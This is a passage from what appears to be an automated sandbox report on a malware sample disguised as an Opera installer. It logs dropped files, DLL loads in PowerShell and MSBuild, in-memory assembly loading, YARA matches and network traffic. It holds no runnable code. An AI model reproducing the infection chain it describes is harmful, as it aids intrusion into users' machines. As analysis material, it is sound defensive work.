                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: sfc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpWindow found: window name: TMainFormJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: DIFXAPI.pdb source: is-JNHPI.tmp.10.dr
                        Source: Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdbSHA256 source: is-40U72.tmp.10.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\SourceDirWith49CharsLengthTestForLongPaths\artifacts\obj\Microsoft.Azure.Management.ResourceManager\Debug\net461\Microsoft.Azure.Management.ResourceManager.pdb source: is-40U72.tmp.10.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OperaAirSetup.exe, 0000000C.00000002.2868710892.000000000480C000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2872199947.0000000006050000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004371000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: D:\tinderboxa\win-7.0\out\win.amd64\release\obj\VBoxProxyStub\VBoxProxyStub.pdb source: is-SBTFQ.tmp.10.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: OperaAirSetup.exe, 0000000C.00000002.2871342182.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2868710892.0000000004923000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: cmd.tmp, 00000008.00000003.2359613822.0000000002189000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.10.dr, cmd.exe.0.dr

                        Data Obfuscation

                        barindex
                        Source: 12.2.OperaAirSetup.exe.29b243e.1.raw.unpack, Sivhfdf.cs.Net Code: Spqgn System.AppDomain.Load(byte[])
                        Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 12.2.OperaAirSetup.exe.5d20000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 12.2.OperaAirSetup.exe.6050000.13.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: 12.2.OperaAirSetup.exe.59c0000.9.raw.unpack, Sivhfdf.cs.Net Code: Spqgn System.AppDomain.Load(byte[])
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                        Source: 12.2.OperaAirSetup.exe.4375570.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                        Source: Yara matchFile source: 12.3.OperaAirSetup.exe.4a11aa7.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.OperaAirSetup.exe.4a11aa7.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.OperaAirSetup.exe.5ca0000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.OperaAirSetup.exe.5ca0000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.3.OperaAirSetup.exe.49d1a87.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2871226896.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000003.2849424911.00000000049C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: OperaAirSetup.exe PID: 5712, type: MEMORYSTR
                        Source: is-40U72.tmp.10.drStatic PE information: 0xEFE7255A [Wed Jul 17 12:36:42 2097 UTC]
                        Source: is-JNHPI.tmp.10.drStatic PE information: section name: .srdata
                        Source: is-SBTFQ.tmp.10.drStatic PE information: section name: .orpc
                        Source: is-IS7LO.tmp.10.drStatic PE information: section name: .fptable
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_04E32CA5 pushad ; iretd 0_2_04E32CD9
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_04E334BF push esp; iretd 0_2_04E334D1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_04E3D2A0 push eax; mov dword ptr [esp], edx0_2_04E3D2B4
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EBA338 push ecx; ret 12_2_00EBA34D
                        Source: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exeCode function: 12_2_00EB9C74 push ecx; ret 12_2_00EB9C87
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00447940 push eax; mov dword ptr [esp], BAB5B4C7h13_2_00447943
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044E95C pushfd ; iretd 13_2_0044E975
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044F3B8 pushad ; iretd 13_2_0044F3B9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0044DE6C pushad ; ret 13_2_0044DE6F
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\bassenc_ogg.dll (copy)Jump to dropped file
                        Source: C:\Windows\Temp\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\OperaAirSetup.exe (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JNHPI.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-UDKGG.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_isdecmp.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-IS7LO.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_isdecmp.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\VBoxProxyStub.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-UF1BO.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-JLLE4.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\difxapi.dll (copy)Jump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\Microsoft.Azure.Management.ResourceManager.dll (copy)Jump to dropped file
                        Source: C:\Windows\Temp\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\is-U5ORL.tmp\cmd.tmpJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-40U72.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\is-SBTFQ.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HBH3Q.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-S5GEB.tmp\cmd.tmpFile created: C:\Users\user\AppData\Roaming\{EA11343B-B7FA-4762-9963-C343D36A91DA}\7za.dll (copy)Jump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\cmd.exeJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 5001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49813
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
